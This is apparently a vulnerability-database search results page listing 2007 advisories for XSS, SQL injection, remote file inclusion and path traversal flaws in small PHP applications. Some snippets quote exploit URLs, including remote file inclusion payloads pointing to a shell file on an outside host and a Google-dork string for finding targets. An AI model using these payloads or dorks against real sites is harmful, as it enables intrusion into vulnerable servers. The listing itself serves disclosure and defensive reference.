7210 matches found

Cvelist
added 2007/08/08 1:11 a.m. · 16 views

CVE-2007-4178

Cross-site scripting (XSS) vulnerability in index.php in WebDirector 2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the deslocal parameter...

5.7 AI score · 0.01545 EPSS
Exploits: 1 · References: 5

securityvulns
added 2007/08/08 12:0 a.m. · 51 views

VietPHP Remote File Inclusion Vulnerability

VietPHP Remote File Inclusion Vulnerability Vuln. code : in: admin/index.php /index.php /functions DoRk: Powered by VietPHP Exploit: www.server.com/path/admin/index.php?language=Sh3LL www.server.com/index.php??language=Sh3LL www.server.com/functions.php?dirpath=Sh3LL...

2.8 AI score
Exploits: 0

Packet Storm
added 2007/08/08 12:0 a.m. · 32 views

vietphp-rfi.txt

VietPHP Remote File Inclusion Vulnerability Vuln. code : in: admin/index.php /index.php /functions DoRk: Powered by VietPHP Exploit: www.server.com/path/admin/index.php?language=Sh3LL www.server.com/index.php??language=Sh3LL www.server.com/functions.php?dirpath=Sh3LL...

7.4 AI score
Exploits: 0

Patchstack
added 2007/08/07 12:0 a.m. · 57 views

WordPress Blue Memories Plugin <= 1.5 - XSS

Because of this vulnerability in index.php, the attackers can inject arbitrary web script or HTML via the "s" parameter. Solution: Update the theme...

4.3CVSS3AI score0.02874EPSS
Exploits: 0 · References: 1 · Affected Software: 1

Positive Technologies
added 2007/08/07 12:0 a.m. · 5 views

PT-2007-5361 · Xuyiyang · Blue Memories Theme

Cross-site scripting (XSS) vulnerability in index.php in the Blue Memories theme 1.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter, possibly a related issue to CVE-2007-2757 and CVE-2007-4014. NOTE: the provenance of this information is unknown; th...

6.8 CVSS · 5.6 AI score · 0.04897 EPSS
Exploits: 0 · References: 6

NVD
added 2007/08/03 9:17 p.m. · 21 views

CVE-2007-4156

Multiple SQL injection vulnerabilities in wolioCMS allow remote attackers to execute arbitrary SQL commands via (1) the id parameter to member.php in a page action, related to a SELECT statement in common.php; and the (2) loginid parameter (uid variable), and possibly the (3) pwd parameter, to...

7.5 CVSS · 8.6 AI score · 0.01264 EPSS
Exploits: 0 · References: 7

Prion
added 2007/08/03 9:17 p.m. · 16 views

SQL injection

Multiple SQL injection vulnerabilities in wolioCMS allow remote attackers to execute arbitrary SQL commands via (1) the id parameter to member.php in a page action, related to a SELECT statement in common.php; and the (2) loginid parameter (uid variable), and possibly the (3) pwd parameter, to...

7.5 CVSS · 9.3 AI score · 0.01264 EPSS
Exploits: 0 · References: 7

Cvelist
added 2007/08/03 9:0 p.m. · 22 views

CVE-2007-4156

Multiple SQL injection vulnerabilities in wolioCMS allow remote attackers to execute arbitrary SQL commands via (1) the id parameter to member.php in a page action, related to a SELECT statement in common.php; and the (2) loginid parameter (uid variable), and possibly the (3) pwd parameter, to...

8.6 AI score · 0.01264 EPSS
Exploits: 0 · References: 7

NVD
added 2007/08/03 10:17 a.m. · 17 views

CVE-2007-4141

OpenRat CMS 0.8-beta1 and earlier allows remote attackers to obtain sensitive information via a request containing an XSS sequence in the action parameter to index.php, which reveals the path in an error message...

4.3 CVSS · 5.7 AI score · 0.01022 EPSS
Exploits: 0 · References: 3

CVE
added 2007/08/01 4:0 p.m. · 39 views

CVE-2007-4117

Affected software: phpWebFileManager 0.5. The issue is described as a PHP remote file inclusion vulnerability in index.php via the PN_PathPrefix parameter, allowing remote code execution. The underlying cause is the handling of PN_PathPrefix in the index.php file, with the note that a reliable th...

6.8 CVSS · 7.5 AI score · 0.01349 EPSS
Exploits: 0 · References: 4 · Affected Software: 1

Positive Technologies
added 2007/08/01 12:0 a.m. · 4 views

PT-2007-5319 · Php · Phpwebfilemanager

Name of the Vulnerable Software and Affected Versions: phpWebFileManager version 0.5. Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the PN_PathPrefix parameter in the index.php file. However, this issue is disputed by a reliable third party, who...

6.8 CVSS · 7.9 AI score · 0.01349 EPSS
Exploits: 0 · References: 6

Packet Storm
added 2007/07/31 12:0 a.m. · 28 views

woliocms-sql.txt

wolioCMS - SQL Injection and Bypass Administrator Login Vendor : http://www.buton.web.id/member.php?member=anon Download : http://www.buton.web.id/download/woliocms.zip Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg @irc.dal.net This exploit works if...

7.4 AI score
Exploits: 0

securityvulns
added 2007/07/31 12:0 a.m. · 34 views

Madoa Poll v1.1 Remote File Include Vulnerabilities

Madoa Poll v1.1 Remote File Include Vulnerabilities ilker kandemir ilkerkandemiratmynet.com info: / Everything for the homeland / Download: http://www.finnermark.se/madoa/Madoapoll11.zip TnX.: Ajann, Dumenci, H0tTurk, Str0ke Bug: require $Madoa . "config.php"; Exploit: index.php?Madoa=http://sheel.txt?...

1.4 AI score
Exploits: 0

Prion
added 2007/07/30 5:30 p.m. · 19 views

Design/Logic Flaw

Webbler CMS before 3.1.6 provides the full installation path within HTML comments in certain documents, which allows remote attackers to obtain sensitive information by viewing the HTML source, as demonstrated by viewing the source generated from index.php...

5 CVSS · 6.5 AI score · 0.01218 EPSS
Exploits: 0 · References: 4 · Affected Software: 1

Prion
added 2007/07/30 5:30 p.m. · 10 views

SQL injection

Multiple SQL injection vulnerabilities in AlstraSoft Affiliate Network Pro allow remote attackers to execute arbitrary SQL commands via (1) the pgmid parameter in an uploadProducts action to merchants/index.php and possibly (2) the rowid parameter to merchants/temp.php...

7.5 CVSS · 9.3 AI score · 0.00994 EPSS
Exploits: 1 · References: 4 · Affected Software: 1

NVD
added 2007/07/27 10:30 p.m. · 19 views

CVE-2007-4046

SQL injection vulnerability in index.php in the Pony Gallery (com_ponygallery) 1.5 and earlier component for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter...

7.5 CVSS · 8.4 AI score · 0.02167 EPSS
Exploits: 2 · References: 5

CVE
added 2007/07/27 10:0 p.m. · 62 views

CVE-2007-4046

CVE-2007-4046 is a SQL injection vulnerability in the Pony Gallery (com_ponygallery) for Joomla! 1.5 and earlier, exploitable via the catid parameter in index.php. Remote attackers could execute arbitrary SQL commands. Documents confirm affected software and an exploit/disclosure trail (e.g., exp...

7.5 CVSS · 8.4 AI score · 0.02167 EPSS
Exploits: 2 · References: 5 · Affected Software: 1

CVE
added 2007/07/26 7:0 p.m. · 42 views

CVE-2007-4028

CVE-2007-4028 affects Webspell 4.01.02. A vulnerability in index.php allows absolute path traversal, enabling remote attackers to include and execute arbitrary local files via a full pathname in the site parameter. CVSS v2 base score 7.5 (HIGH): Network vector, no authentication, low attack compl...

7.5 CVSS · 7.1 AI score · 0.01523 EPSS
Exploits: 1 · References: 5 · Affected Software: 1

Cvelist
added 2007/07/26 7:0 p.m. · 23 views

CVE-2007-4028

Absolute path traversal vulnerability in index.php in Webspell 4.01.02 allows remote attackers to include and execute arbitrary local files via a full pathname in the site parameter. NOTE: some of these details are obtained from third party information...

7 AI score · 0.01523 EPSS
Exploits: 1 · References: 5

Prion
added 2007/07/25 5:30 p.m. · 11 views

SQL injection

SQL injection vulnerability in index.php in bwired allows remote attackers to execute arbitrary SQL commands via the newsID parameter...

7.5 CVSS · 9.1 AI score · 0.01029 EPSS
Exploits: 0 · References: 4